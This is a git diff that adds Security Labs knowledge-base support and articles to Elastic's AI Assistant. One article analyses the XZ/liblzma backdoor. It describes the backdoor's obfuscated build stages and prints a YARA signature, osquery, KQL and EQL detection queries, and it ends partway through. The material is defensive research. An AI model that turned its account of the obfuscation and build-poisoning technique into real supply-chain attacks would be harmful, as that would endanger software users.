diff --git a/x-pack/packages/kbn-elastic-assistant-common/impl/schemas/knowledge_base/crud_kb_route.gen.ts b/x-pack/packages/kbn-elastic-assistant-common/impl/schemas/knowledge_base/crud_kb_route.gen.ts
index ca00075b30e36..4eb41f0c1f136 100644
--- a/x-pack/packages/kbn-elastic-assistant-common/impl/schemas/knowledge_base/crud_kb_route.gen.ts
+++ b/x-pack/packages/kbn-elastic-assistant-common/impl/schemas/knowledge_base/crud_kb_route.gen.ts
@@ -81,4 +81,5 @@ export const ReadKnowledgeBaseResponse = z.object({
   is_setup_available: z.boolean().optional(),
   is_setup_in_progress: z.boolean().optional(),
   pipeline_exists: z.boolean().optional(),
+  security_labs_exists: z.boolean().optional(),
 });
diff --git a/x-pack/packages/kbn-elastic-assistant-common/impl/schemas/knowledge_base/crud_kb_route.schema.yaml b/x-pack/packages/kbn-elastic-assistant-common/impl/schemas/knowledge_base/crud_kb_route.schema.yaml
index 8b4e6bfaca5ec..07d271e860756 100644
--- a/x-pack/packages/kbn-elastic-assistant-common/impl/schemas/knowledge_base/crud_kb_route.schema.yaml
+++ b/x-pack/packages/kbn-elastic-assistant-common/impl/schemas/knowledge_base/crud_kb_route.schema.yaml
@@ -78,6 +78,8 @@ paths:
                     type: boolean
                   pipeline_exists:
                     type: boolean
+                  security_labs_exists:
+                    type: boolean
         400:
           description: Generic Error
           content:
diff --git a/x-pack/packages/kbn-elastic-assistant/impl/assistant/api/knowledge_base/use_knowledge_base_status.tsx b/x-pack/packages/kbn-elastic-assistant/impl/assistant/api/knowledge_base/use_knowledge_base_status.tsx
index 6749b260fbfb9..7f248e1c4c260 100644
--- a/x-pack/packages/kbn-elastic-assistant/impl/assistant/api/knowledge_base/use_knowledge_base_status.tsx
+++ b/x-pack/packages/kbn-elastic-assistant/impl/assistant/api/knowledge_base/use_knowledge_base_status.tsx
@@ -90,6 +90,7 @@ export const isKnowledgeBaseSetup = (kbStatus: ReadKnowledgeBaseResponse | undef
   return (
     (kbStatus?.elser_exists &&
       kbStatus?.esql_exists &&
+      kbStatus?.security_labs_exists &&
       kbStatus?.index_exists &&
       kbStatus?.pipeline_exists) ??
     false
diff --git a/x-pack/packages/kbn-elastic-assistant/impl/assistant/chat_send/use_chat_send.tsx b/x-pack/packages/kbn-elastic-assistant/impl/assistant/chat_send/use_chat_send.tsx
index 95de527ff7a3a..0fabba65110b4 100644
--- a/x-pack/packages/kbn-elastic-assistant/impl/assistant/chat_send/use_chat_send.tsx
+++ b/x-pack/packages/kbn-elastic-assistant/impl/assistant/chat_send/use_chat_send.tsx
@@ -63,7 +63,8 @@ export const useChatSend = ({
     kbStatus?.elser_exists &&
     kbStatus?.index_exists &&
     kbStatus?.pipeline_exists &&
-    kbStatus?.esql_exists;
+    kbStatus?.esql_exists &&
+    kbStatus?.security_labs_exists;
 
   // Handles sending latest user prompt to API
   const handleSendMessage = useCallback(
diff --git a/x-pack/packages/kbn-elastic-assistant/impl/knowledge_base/knowledge_base_settings.tsx b/x-pack/packages/kbn-elastic-assistant/impl/knowledge_base/knowledge_base_settings.tsx
index 873296ea57840..df254805d9cee 100644
--- a/x-pack/packages/kbn-elastic-assistant/impl/knowledge_base/knowledge_base_settings.tsx
+++ b/x-pack/packages/kbn-elastic-assistant/impl/knowledge_base/knowledge_base_settings.tsx
@@ -55,8 +55,13 @@ export const KnowledgeBaseSettings: React.FC<Props> = React.memo(
     // Resource enabled state
     const isElserEnabled = kbStatus?.elser_exists ?? false;
     const isESQLEnabled = kbStatus?.esql_exists ?? false;
+    const isSecurityLabsEnabled = kbStatus?.security_labs_exists ?? false;
     const isKnowledgeBaseSetup =
-      (isElserEnabled && isESQLEnabled && kbStatus?.index_exists && kbStatus?.pipeline_exists) ??
+      (isElserEnabled &&
+        isESQLEnabled &&
+        isSecurityLabsEnabled &&
+        kbStatus?.index_exists &&
+        kbStatus?.pipeline_exists) ??
       false;
     const isSetupInProgress = kbStatus?.is_setup_in_progress ?? false;
     const isSetupAvailable = kbStatus?.is_setup_available ?? false;
diff --git a/x-pack/packages/kbn-elastic-assistant/impl/knowledge_base/knowledge_base_settings_management/helpers.ts b/x-pack/packages/kbn-elastic-assistant/impl/knowledge_base/knowledge_base_settings_management/helpers.ts
index 3d522ab975f3c..75d66a355d781 100644
--- a/x-pack/packages/kbn-elastic-assistant/impl/knowledge_base/knowledge_base_settings_management/helpers.ts
+++ b/x-pack/packages/kbn-elastic-assistant/impl/knowledge_base/knowledge_base_settings_management/helpers.ts
@@ -12,13 +12,15 @@ import {
 } from '@kbn/elastic-assistant-common';
 import { z } from '@kbn/zod';
 
-export const isEsqlSystemEntry = (
+export const isSystemEntry = (
   entry: KnowledgeBaseEntryResponse
 ): entry is KnowledgeBaseEntryResponse & {
   type: DocumentEntryType;
-  kbResource: 'esql';
+  kbResource: 'esql' | 'security_labs';
 } => {
-  return entry.type === DocumentEntryType.value && entry.kbResource === 'esql';
+  return (
+    entry.type === DocumentEntryType.value && ['esql', 'security_labs'].includes(entry.kbResource)
+  );
 };
 
 export const isKnowledgeBaseEntryCreateProps = (
diff --git a/x-pack/packages/kbn-elastic-assistant/impl/knowledge_base/knowledge_base_settings_management/index.tsx b/x-pack/packages/kbn-elastic-assistant/impl/knowledge_base/knowledge_base_settings_management/index.tsx
index 8e551781563f1..a2097177a2ca4 100644
--- a/x-pack/packages/kbn-elastic-assistant/impl/knowledge_base/knowledge_base_settings_management/index.tsx
+++ b/x-pack/packages/kbn-elastic-assistant/impl/knowledge_base/knowledge_base_settings_management/index.tsx
@@ -43,7 +43,7 @@ import { KnowledgeBaseSettings } from '../knowledge_base_settings';
 import { SetupKnowledgeBaseButton } from '../setup_knowledge_base_button';
 import { useDeleteKnowledgeBaseEntries } from '../../assistant/api/knowledge_base/entries/use_delete_knowledge_base_entries';
 import {
-  isEsqlSystemEntry,
+  isSystemEntry,
   isKnowledgeBaseEntryCreateProps,
   isKnowledgeBaseEntryResponse,
 } from './helpers';
@@ -152,13 +152,13 @@ export const KnowledgeBaseSettingsManagement: React.FC = React.memo(() => {
           openFlyout();
         },
         isDeleteEnabled: (entry: KnowledgeBaseEntryResponse) => {
-          return !isEsqlSystemEntry(entry);
+          return !isSystemEntry(entry);
         },
         onDeleteActionClicked: ({ id }: KnowledgeBaseEntryResponse) => {
           deleteEntry({ ids: [id] });
         },
         isEditEnabled: (entry: KnowledgeBaseEntryResponse) => {
-          return !isEsqlSystemEntry(entry);
+          return !isSystemEntry(entry);
         },
         onEditActionClicked: ({ id }: KnowledgeBaseEntryResponse) => {
           const entry = entries.data.find((e) => e.id === id);
diff --git a/x-pack/packages/kbn-elastic-assistant/impl/knowledge_base/knowledge_base_settings_management/use_knowledge_base_table.tsx b/x-pack/packages/kbn-elastic-assistant/impl/knowledge_base/knowledge_base_settings_management/use_knowledge_base_table.tsx
index 380e6ffedf3ce..5af360a598205 100644
--- a/x-pack/packages/kbn-elastic-assistant/impl/knowledge_base/knowledge_base_settings_management/use_knowledge_base_table.tsx
+++ b/x-pack/packages/kbn-elastic-assistant/impl/knowledge_base/knowledge_base_settings_management/use_knowledge_base_table.tsx
@@ -18,7 +18,7 @@ import { useAssistantContext } from '../../..';
 import * as i18n from './translations';
 import { BadgesColumn } from '../../assistant/common/components/assistant_settings_management/badges';
 import { useInlineActions } from '../../assistant/common/components/assistant_settings_management/inline_actions';
-import { isEsqlSystemEntry } from './helpers';
+import { isSystemEntry } from './helpers';
 
 export const useKnowledgeBaseTable = () => {
   const { currentUserAvatar } = useAssistantContext();
@@ -29,7 +29,7 @@ export const useKnowledgeBaseTable = () => {
       if (entry.kbResource === 'user') {
         return 'userAvatar';
       }
-      if (entry.kbResource === 'esql') {
+      if (['esql', 'security_labs'].includes(entry.kbResource)) {
         return 'logoElastic';
       }
       return 'visText';
@@ -83,8 +83,8 @@ export const useKnowledgeBaseTable = () => {
           render: (entry: KnowledgeBaseEntryResponse) => {
             // TODO: Look up user from `createdBy` id if privileges allow
             const userName = entry.users?.[0]?.name ?? 'Unknown';
-            const badgeItem = isEsqlSystemEntry(entry) ? 'Elastic' : userName;
-            const userImage = isEsqlSystemEntry(entry) ? (
+            const badgeItem = isSystemEntry(entry) ? 'Elastic' : userName;
+            const userImage = isSystemEntry(entry) ? (
               <EuiIcon
                 type={'logoElastic'}
                 css={css`
@@ -124,7 +124,7 @@ export const useKnowledgeBaseTable = () => {
         {
           name: i18n.COLUMN_ENTRIES,
           render: (entry: KnowledgeBaseEntryResponse) => {
-            return isEsqlSystemEntry(entry)
+            return isSystemEntry(entry)
               ? entry.text
               : entry.type === DocumentEntryType.value
               ? '1'
diff --git a/x-pack/packages/kbn-elastic-assistant/impl/knowledge_base/setup_knowledge_base_button.tsx b/x-pack/packages/kbn-elastic-assistant/impl/knowledge_base/setup_knowledge_base_button.tsx
index 094d3164c531d..533f3fe35922c 100644
--- a/x-pack/packages/kbn-elastic-assistant/impl/knowledge_base/setup_knowledge_base_button.tsx
+++ b/x-pack/packages/kbn-elastic-assistant/impl/knowledge_base/setup_knowledge_base_button.tsx
@@ -34,7 +34,8 @@ export const SetupKnowledgeBaseButton: React.FC<Props> = React.memo(({ display }
     kbStatus?.elser_exists &&
     kbStatus?.index_exists &&
     kbStatus?.pipeline_exists &&
-    kbStatus?.esql_exists;
+    kbStatus?.esql_exists &&
+    kbStatus?.security_labs_exists;
 
   const onInstallKnowledgeBase = useCallback(() => {
     setupKB(ESQL_RESOURCE);
diff --git a/x-pack/plugins/elastic_assistant/server/ai_assistant_data_clients/find.ts b/x-pack/plugins/elastic_assistant/server/ai_assistant_data_clients/find.ts
index 3fe1c36832235..101354a6802b7 100644
--- a/x-pack/plugins/elastic_assistant/server/ai_assistant_data_clients/find.ts
+++ b/x-pack/plugins/elastic_assistant/server/ai_assistant_data_clients/find.ts
@@ -5,7 +5,11 @@
  * 2.0.
  */
 
-import { MappingRuntimeFields, Sort } from '@elastic/elasticsearch/lib/api/types';
+import {
+  AggregationsAggregationContainer,
+  MappingRuntimeFields,
+  Sort,
+} from '@elastic/elasticsearch/lib/api/types';
 import { ElasticsearchClient, Logger } from '@kbn/core/server';
 
 import { estypes } from '@elastic/elasticsearch';
@@ -22,6 +26,7 @@ interface FindOptions {
   index: string;
   runtimeMappings?: MappingRuntimeFields | undefined;
   logger: Logger;
+  aggs?: Record<string, AggregationsAggregationContainer>;
 }
 
 export interface FindResponse<T> {
@@ -41,6 +46,7 @@ export const findDocuments = async <TSearchSchema>({
   fields,
   sortOrder,
   logger,
+  aggs,
 }: FindOptions): Promise<FindResponse<TSearchSchema>> => {
   const query = getQueryFilter({ filter });
   let sort: Sort | undefined;
@@ -67,6 +73,7 @@ export const findDocuments = async <TSearchSchema>({
       index,
       seq_no_primary_term: true,
       size: perPage,
+      aggs,
     });
     return {
       data: response,
diff --git a/x-pack/plugins/elastic_assistant/server/ai_assistant_data_clients/index.ts b/x-pack/plugins/elastic_assistant/server/ai_assistant_data_clients/index.ts
index 9c88765863724..cc74e1f03d3d9 100644
--- a/x-pack/plugins/elastic_assistant/server/ai_assistant_data_clients/index.ts
+++ b/x-pack/plugins/elastic_assistant/server/ai_assistant_data_clients/index.ts
@@ -99,6 +99,7 @@ export class AIAssistantDataClient {
     sortOrder,
     filter,
     fields,
+    aggs,
   }: {
     perPage: number;
     page: number;
@@ -106,6 +107,7 @@ export class AIAssistantDataClient {
     sortOrder?: string;
     filter?: string;
     fields?: string[];
+    aggs?: Record<string, estypes.AggregationsAggregationContainer>;
   }): Promise<Promise<FindResponse<TSearchSchema>>> => {
     const esClient = await this.options.elasticsearchClientPromise;
     return findDocuments<TSearchSchema>({
@@ -118,6 +120,7 @@ export class AIAssistantDataClient {
       index: this.indexTemplateAndPattern.alias,
       sortOrder: sortOrder as estypes.SortOrder,
       logger: this.options.logger,
+      aggs,
     });
   };
 }
diff --git a/x-pack/plugins/elastic_assistant/server/ai_assistant_data_clients/knowledge_base/index.ts b/x-pack/plugins/elastic_assistant/server/ai_assistant_data_clients/knowledge_base/index.ts
index 932f90491a1c0..7f665fa7f9a16 100644
--- a/x-pack/plugins/elastic_assistant/server/ai_assistant_data_clients/knowledge_base/index.ts
+++ b/x-pack/plugins/elastic_assistant/server/ai_assistant_data_clients/knowledge_base/index.ts
@@ -35,13 +35,17 @@ import {
 } from './create_knowledge_base_entry';
 import { EsDocumentEntry, EsIndexEntry, EsKnowledgeBaseEntrySchema } from './types';
 import { transformESSearchToKnowledgeBaseEntry } from './transforms';
-import { ESQL_DOCS_LOADED_QUERY } from '../../routes/knowledge_base/constants';
+import {
+  ESQL_DOCS_LOADED_QUERY,
+  SECURITY_LABS_RESOURCE,
+} from '../../routes/knowledge_base/constants';
 import {
   getKBVectorSearchQuery,
   getStructuredToolForIndexEntry,
   isModelAlreadyExistsError,
 } from './helpers';
 import { getKBUserFilter } from '../../routes/knowledge_base/entries/utils';
+import { loadSecurityLabs } from '../../lib/langchain/content_loaders/security_labs_loader';
 
 /**
  * Params for when creating KbDataClient in Request Context Factory. Useful if needing to modify
@@ -203,9 +207,11 @@ export class AIAssistantKnowledgeBaseDataClient extends AIAssistantDataClient {
   public setupKnowledgeBase = async ({
     soClient,
     installEsqlDocs = true,
+    installSecurityLabsDocs = true,
   }: {
     soClient: SavedObjectsClientContract;
     installEsqlDocs?: boolean;
+    installSecurityLabsDocs?: boolean;
   }): Promise<void> => {
     if (this.options.getIsKBSetupInProgress()) {
       this.options.logger.debug('Knowledge Base setup already in progress');
@@ -257,6 +263,16 @@ export class AIAssistantKnowledgeBaseDataClient extends AIAssistantDataClient {
           this.options.logger.debug(`Knowledge Base docs already loaded!`);
         }
       }
+
+      if (installSecurityLabsDocs) {
+        const labsDocsLoaded = await this.isSecurityLabsDocsLoaded();
+        if (!labsDocsLoaded) {
+          this.options.logger.debug(`Loading Security Labs KB docs...`);
+          await loadSecurityLabs(this, this.options.logger);
+        } else {
+          this.options.logger.debug(`Security Labs Knowledge Base docs already loaded!`);
+        }
+      }
     } catch (e) {
       this.options.setIsKBSetupInProgress(false);
       this.options.logger.error(`Error setting up Knowledge Base: ${e.message}`);
@@ -352,6 +368,18 @@ export class AIAssistantKnowledgeBaseDataClient extends AIAssistantDataClient {
     return esqlDocs.length > 0;
   };
 
+  /**
+   * Returns if Security Labs KB docs have been loaded
+   */
+  public isSecurityLabsDocsLoaded = async (): Promise<boolean> => {
+    const securityLabsDocs = await this.getKnowledgeBaseDocumentEntries({
+      query: '',
+      kbResource: SECURITY_LABS_RESOURCE,
+      required: false,
+    });
+    return securityLabsDocs.length > 0;
+  };
+
   /**
    * Performs similarity search to retrieve LangChain Documents from the knowledge base
    */
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/2022_elastic_global_threat_report_announcement.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/2022_elastic_global_threat_report_announcement.md
new file mode 100644
index 0000000000000..e29c3b2989edb
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/2022_elastic_global_threat_report_announcement.md
@@ -0,0 +1,15 @@
+---
+title: "2022 Elastic Global Threat Report Announcement"
+slug: "2022-elastic-global-threat-report-announcement"
+date: "2022-11-30"
+description: "Discover our latest findings & strategic recommendations to better stay informed of potential directions threat actors may focus on."
+author:
+  - slug: devon-kerr
+image: "gtr-blog-image-720x420.jpg"
+category:
+  - slug: reports
+---
+
+Today Elastic Security Labs celebrates another milestone: launching the [2022 Elastic Global Threat Report](https://www.elastic.co/explore/security-without-limits/global-threat-report), our inaugural summary of threat trends, forecasts, and recommendations. We analyzed millions of telemetry events from sources around the world to share these insights with you; all part of our continued commitment to transparency, and our mission to protect the world's data.
+
+You can find the report [here](https://www.elastic.co/explore/security-without-limits/global-threat-report), we're excited to share it with you.
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/2022_elastic_global_threat_report_helping_security_leaders_navigate_todays_threat_landscape.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/2022_elastic_global_threat_report_helping_security_leaders_navigate_todays_threat_landscape.md
new file mode 100644
index 0000000000000..e676f8c21714c
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/2022_elastic_global_threat_report_helping_security_leaders_navigate_todays_threat_landscape.md
@@ -0,0 +1,41 @@
+---
+title: "2022 Elastic Global Threat Report: Helping security leaders navigate today’s threat landscape"
+slug: "2022-elastic-global-threat-report-helping-security-leaders-navigate-todays-threat-landscape"
+date: "2022-11-30"
+description: "A significant percentage of all cyber threats achieve a degree of success against technical, procedural, and human mitigations. So what is a company to do in the face of such unfavorable odds? Find out in this article."
+author:
+  - slug: ken-exner
+image: "gtr-blog-image-720x420.jpg"
+category:
+  - slug: reports
+---
+
+As the threat landscape continues to evolve, cybersecurity stakes are growing exponentially higher for today’s organizations. Between Log4j, geopolitical tension, and increasing ransomware threats, security is not just at the top of the business agenda but also the societal agenda. Meanwhile, threat actors have adopted new capabilities and methods while increasing their cadence of activity.
+
+Threat detection and response has come a long way since the firewall dissolved and the cloud took center stage. AI and machine learning, for example, have been major contributors to the advancement of cybersecurity. Machine learning is being used to identify malicious behavior from bad actors by modeling network behavior and improving overall threat detection.
+
+What’s been difficult is the sea of sameness filled with vendors promising products to mitigate today’s threats while preparing for the next one. As the [2022 Elastic Global Threat Report](https://www.elastic.co/explore/security-without-limits/global-threat-report) outlines, a significant percentage of all threats achieve a degree of success against technical, procedural, and human mitigations. So what is a company to do in the face of such unfavorable odds? At Elastic, we believe there are several ingredients that are critical to managing today’s threat landscape.
+
+## Build a program, not just a tool
+
+Vendors need to start thinking about security products as more than software. They are part of a living, breathing program that takes care and feeding. For Elastic, it’s not just about shipping a solution; it’s about offering a holistic approach to security that happens to come with a great product. It’s sharing insights and best practices and creating a community focused on security data intelligence that extends the value of Elastic Security for customers.
+
+The 2022 Elastic Threat Report is an important part of that program, and we’re excited to share our knowledge with the community. In addition to vital information from the Elastic Security Labs team, the report provides actionable guidance to security practitioners about how to maximize positive outcomes for their organizations.
+
+## It takes an (open) community
+
+The foundation of any good program is a strong community that can support and foster it. Take Elastic’s commitment to open security, for example. The community born from vendors being transparent about their security controls, detection rules, and threat logic can be a force multiplier of best practices across the entire industry.
+
+When vendors engage their experts with experts from across the broader security community about new threats they’ve observed or innovative methods for detecting nuanced attacks, it creates greater scalability of system defenses — not just for the enterprise but also for their customers.
+
+For example, at Elastic we recently opened our Endpoint Security [protections-artifacts repo](https://github.com/elastic/protections-artifacts), adding to our already open [detection-rules repo](https://github.com/elastic/detection-rules/tree/main/rules), to foster further collaboration with our community and be transparent about how we protect users.
+
+## Treat the cause, not the symptom
+
+Despite the ever-growing threat landscape and the risks that it poses, many organizations are still treating security symptoms instead of the cause. Companies can no longer afford to keep the security team siloed and separate from the engineering team. The two functions must work closely to build products and solutions that can withstand the barrage of advancing threats.
+
+At Elastic, we design and build products with security in mind from the start, so it’s baked into every solution we ship to our customers. In fact, we take security so seriously that the office of InfoSec is part of the engineering organization.
+
+We hope that the 2022 Elastic Global Threat Report will help your understanding of the important shifts in the threat landscape, and provide the information you need to make your organization more resilient, prepared, and protected.
+
+[Download the 2022 Elastic Global Threat Report](https://www.elastic.co/explore/security-without-limits/global-threat-report).
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/500ms_to_midnight.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/500ms_to_midnight.md
new file mode 100644
index 0000000000000..1b2fb19a91308
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/500ms_to_midnight.md
@@ -0,0 +1,178 @@
+---
+title: "500ms to midnight: XZ / liblzma backdoor"
+slug: "500ms-to-midnight"
+date: "2024-04-05"
+description: "Elastic Security Labs is releasing an initial analysis of the XZ Utility backdoor, including YARA rules, osquery, and KQL searches to identify potential compromises."
+author:
+  - slug: samir-bousseaden
+  - slug: mika-ayenson
+  - slug: jake-king
+image: "500ms-to-midnight.jpg"
+category:
+  - slug: security-research
+  - slug: vulnerability-updates
+tags:
+  - linux
+  - vulnerability
+  - cve-2024-3094
+---
+
+## Key Takeaways
+
+* On March 29, 2024, Andres Freund identified malicious commits to the command-line utility XZ, impacting versions 5.6.0 and 5.6.1 for Linux, and shared the information on the oss-security mailing list.
+* Andres’ discovery was made after an increase of _500ms_ in latency was observed with SSH login attempts initiated from a development system, amongst other anomalies.
+* The backdoor identified has been designed to circumvent authentication controls within SSH to remotely execute code, potentially gaining access to other systems in the environment.
+* The code commits were added and signed by [JiaT75](https://tukaani.org/xz-backdoor) (now suspended), who contributed to the popular open source project for several years.
+* Security researchers are still undertaking an initial analysis of the payload, dissecting both the build process and the backdoor.
+* Elastic has released both YARA signatures, detection rules, and osquery queries, allowing Linux system maintainers to understand the impact and block potential compromises early.
+
+## The XZ / liblzma backdoor at a glance
+
+On March 29 2024, the widely adopted XZ package used within many Linux distributions as a library used by the system to interact with SSH client connections (and many other system utilities) was pulled into the spotlight after a _500ms_ delay with intermittent failures. What began as a routine investigation into that anomaly would take a surprising and unexpected twist: malicious, obfuscated code was planted in the package by a maintainer–code that was also in circulation for a few weeks via a poisoned build process.
+
+Andres Freund, the developer who initially [identified the malicious contributions](https://www.openwall.com/lists/oss-security/2024/03/29/4), observed that the changes had been implemented in versions `5.6.0` and `5.6.1` of the XZ Utils package but had not been widely adopted across all Linux distributions, outside of select bleeding-edge variants typically used for early-stage testing.
+
+[Initial analysis](https://bsky.app/profile/filippo.abyssdomain.expert/post/3kowjkx2njy2b) has shown that the backdoor is designed to circumvent authentication controls in `sshd` via `systemd` and attempts to execute code within a pre-authentication context. Observations made so far have shown that the malicious code is not in its final target state and was perhaps caught early through haphazard mistakes the developer neglected to consider, causing impacts to legitimate SSH use cases.
+
+Alongside the malicious package being circulated within a small number of Linux distributions, several observations have been made in the popular package management software HomeBrew, which has impacted some macOS users. The maintainers of Homebrew-- and other software packages that included this library-- are presently rolling back to prior versions that aren't impacted by these malicious changes, although mainly out of an abundance of caution, as compromised builds were only targeting deb and rpm packages.
+
+The following notice was released on the Tukaani Project’s homepage (the project owner of the [XZ Utils Git repository](https://github.com/tukaani-project/xz)) shortly after the news of the backdoor broke.
+
+![XZ Utils backdoor notification on the Tukaani Project](/assets/images/500ms-to-midnight/image2.png "XZ Utils backdoor notification on the Tukaani Project")
+
+
+The compromise itself, while high risk, is relatively minor in terms of real-world impact given the stage of discovery. This situation should remind security professionals about the importance of understanding supply-chain compromise, monitoring Linux workloads, and auditing system controls. In this situation, defenders had the advantage of time. 
+
+## Backdoor analysis
+
+### XZ backdoor build process:
+
+[CVE-2024-3094](https://nvd.nist.gov/vuln/detail/CVE-2024-3094) explains how the changes in the `liblzma` were created from the malicious additions to the library’s build scripts and directly impacts any software that links the library on an impacted system.
+
+The maliciously modified build script is divided into three stages, starting with the additions in `m4/build-to-host.m4` and progressing through the obfuscation and execution stages. At a high level, some obfuscation techniques include character substitution and selective byte processing commands via the `tr` and `head` commands to decode and execute the malicious payloads in the test files. Interestingly, many impacted tools used are standard Linux system tools typically used by administrators for legitimate purposes.
+
+The [build process](https://gynvael.coldwind.pl/?lang=en&id=782) runs as follows :
+
+* **Stage 0:** The initial malicious code additions attempt to decode the Stage 1 script (hidden code segments) by changing byte values from specific test files, which under normal circumstances appear corrupt, to form a valid XZ stream.
+* **Stage 1:** This stage leverages a bash file with special checks (e.g., the Linux architecture the script runs on) and Bash commands to analyze the environment (e.g. `[ "$(uname)" = "Linux" ]`) to ensure compatible conditions are met for the backdoor. Depending on the outcome of the checks, additional malicious scripts or payloads may be executed.
+* **Stage 2:** This phase involves an infected.txt file, which details the altered extraction and compilation code modifications, namely:
+    * Reconstruction Data: Byte manipulation and decoding techniques on obfuscated compressed data from test files to reconstruct the malicious payload using commands like `sed` and `awk`
+    * Obfuscation and Extraction: Complex decryption and obfuscation techniques using the `tr` command to extract the binary backdoor to remain hidden from typical detection mechanisms
+    * Build Process Manipulation: This changes the build and compilation steps to embed the binary backdoor into Linux system processes
+    * Extension Mechanism: A design that allows for new scripts and updates to the backdoor without modifying the original payload
+    * Future Stage Preparation: Sets the groundwork for malicious follow-up activities, like propagating the backdoor 
+
+## Assessing impact:
+
+Given the limited usage of the impacted beta distributions and software, this compromise should impact few systems. Maintainers of Linux systems are however encouraged to ensure systems are not running impacted versions of `xzutils` / `liblzma` by leveraging the following osquery queries:
+
+[Linux](https://gist.github.com/jamesspi/ee8319f55d49b4f44345c626f80c430f):
+
+```
+SELECT 'DEB Package' AS source, name, version,
+  CASE
+    WHEN version LIKE '5.6.0%' OR version LIKE '5.6.1%' THEN 'Potentially Vulnerable'
+    ELSE 'Most likely not vulnerable'
+  END AS status
+FROM deb_packages
+WHERE name = 'xz-utils' OR name = 'liblzma' OR name LIKE 'liblzma%'
+UNION
+SELECT 'RPM Package' AS source, name, version,
+  CASE
+    WHEN version LIKE '5.6.0%' OR version LIKE '5.6.1%' THEN 'Potentially Vulnerable'
+    ELSE 'Most likely not vulnerable'
+  END AS status
+FROM rpm_packages
+WHERE name = 'xz-utils' OR name = 'liblzma' OR name LIKE 'liblzma%';
+
+```
+
+[macOS](https://gist.github.com/jamesspi/5cb060b5e0e2d43222a71c876b56daab):
+
+```
+SELECT 'Homebrew Package' AS source, name, version,
+  CASE
+    WHEN version LIKE '5.6.0%' OR version LIKE '5.6.1%' THEN 'Potentially Vulnerable'
+    ELSE 'Most likely not vulnerable'
+  END AS status
+FROM homebrew_packages
+WHERE name = 'xz' OR name = 'liblzma';
+```
+
+The following KQL query can be used to query Elastic Defend file events: 
+
+```
+event.category : file and host.os.type : (macos or linux) and file.name : liblzma.so.5.6.*
+```
+
+Alternatively, manually checking the version of XZ running on a system is as simple as running the [following commands](https://x.com/Kostastsale/status/1773890846250926445?s=20) (from researcher [Kostas](https://twitter.com/Kostastsale)) and checking the output version. Remember, versions 5.6.0 and 5.6.1 are impacted and should be rolled back or updated to a newer version.
+
+```
+for xz_p in $(type -a xz | awk '{print $NF}' | uniq); do strings "$xz_p" | grep "xz (XZ Utils)" || echo "No match found for $xz_p"; done
+```
+
+## Malware protection
+
+The following [YARA signature](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Linux_Trojan_XZBackdoor.yar) (disk and in-memory) is deployed in Elastic Defend to block the XZ backdoor.
+
+```
+rule Linux_Trojan_XZBackdoor {
+    meta:
+        author = "Elastic Security"
+        fingerprint = "f1982d1db5aacd2d6b0b4c879f9f75d4413e0d43e58ea7de2b7dff66ec0f93ab"
+        creation_date = "2024-03-30"
+        last_modified = "2024-03-31"
+        threat_name = "Linux.Trojan.XZBackdoor"
+        reference_sample = "5448850cdc3a7ae41ff53b433c2adbd0ff492515012412ee63a40d2685db3049"
+        severity = 100
+        arch_context = "x86"
+        scan_context = "file, memory"
+        license = "Elastic License v2"
+        os = "linux"
+    strings:
+        /* potential backdoor kill-switch as per https://gist.github.com/q3k/af3d93b6a1f399de28fe194add452d01?permalink_comment_id=5006558#file-hashes-txt-L115 */
+        $a1 = "yolAbejyiejuvnup=Evjtgvsh5okmkAvj"
+/* function signature in liblzma used by sshd */
+        $a2 = { F3 0F 1E FA 55 48 89 F5 4C 89 CE 53 89 FB 81 E7 00 00 00 80 48 83 EC 28 48 89 54 24 18 48 89 4C 24 10 }
+ /* unique byte patterns in backdoored liblzma */
+        $b1 = { 48 8D 7C 24 08 F3 AB 48 8D 44 24 08 48 89 D1 4C 89 C7 48 89 C2 E8 ?? ?? ?? ?? 89 C2 }
+        $b2 = { 31 C0 49 89 FF B9 16 00 00 00 4D 89 C5 48 8D 7C 24 48 4D 89 CE F3 AB 48 8D 44 24 48 }
+        $b3 = { 4D 8B 6C 24 08 45 8B 3C 24 4C 8B 63 10 89 85 78 F1 FF FF 31 C0 83 BD 78 F1 FF FF 00 F3 AB 79 07 }
+    condition:
+        1 of ($a*) or all of ($b*)
+}
+```
+
+Detections of this signature  will appear in Elastic as follows: 
+
+![Detecting the Linux.Trojan.XZBackdoor signature in Elastic](/assets/images/500ms-to-midnight/image4.png "Detecting the Linux.Trojan.XZBackdoor signature in Elastic")
+
+
+## Behavior Detection
+
+Leveraging [Elastic Defend](https://docs.elastic.co/en/integrations/endpoint)’s network and process events, we published a new EQL [detection rule](https://github.com/elastic/detection-rules/blob/main/rules/linux/persistence_suspicious_ssh_execution_xzbackdoor.toml) to identify instances where the SSHD service starts, spawns a shell process and immediately terminates unexpectedly all within a very short time span: 
+
+```
+sequence by host.id, user.id with maxspan=1s
+ [process where host.os.type == "linux" and event.type == "start" and event.action == "exec" and process.name == "sshd" and
+    process.args == "-D" and process.args == "-R"] by process.pid, process.entity_id
+ [process where host.os.type == "linux" and event.type == "start" and event.action == "exec" and process.parent.name == "sshd" and 
+  process.executable != "/usr/sbin/sshd"] by process.parent.pid, process.parent.entity_id
+ [process where host.os.type == "linux" and event.action == "end" and process.name == "sshd" and process.exit_code != 0] by process.pid, process.entity_id
+ [network where host.os.type == "linux" and event.type == "end" and event.action == "disconnect_received" and process.name == "sshd"] by process.pid, process.entity_id
+```
+
+![Matches while simulating execution via the backdoor using XZBot - github.com/amlweems/xzbot](/assets/images/500ms-to-midnight/image1.png "Matches while simulating execution via the backdoor using XZBot - github.com/amlweems/xzbot")
+
+
+
+![Timeline view displaying events matching the EQL query](/assets/images/500ms-to-midnight/image3.png "Timeline view displaying events matching the EQL query")
+
+
+## Linux: the final frontier
+
